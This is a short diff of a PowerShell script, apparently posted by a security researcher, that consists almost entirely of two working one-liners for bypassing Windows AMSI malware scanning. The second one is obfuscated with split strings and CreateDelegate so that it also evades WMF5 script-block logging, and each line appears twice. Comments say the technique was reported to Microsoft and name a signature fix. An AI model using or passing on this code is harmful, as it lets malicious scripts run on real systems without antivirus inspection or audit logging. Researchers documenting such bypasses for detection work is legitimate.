BlaiseOfGlory · August 12, 2021 01:24
diff --git a/amsi_and_autologging_bypass.ps1 b/amsi_and_autologging_bypass.ps1
 # My original AMSI bypass - does not attempt to bypass WMF autologging
 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

 # Modified AMSI bypass that also bypasses WMF5 autologging.
 # This was reported to MS. CreateDelegate simply needs to be added to the "suspicious" signature list.
 [Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
	# My original AMSI bypass - does not attempt to bypass WMF autologging
	[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

	# Modified AMSI bypass that also bypasses WMF5 autologging.
	# This was reported to MS. CreateDelegate simply needs to be added to the "suspicious" signature list.
	[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)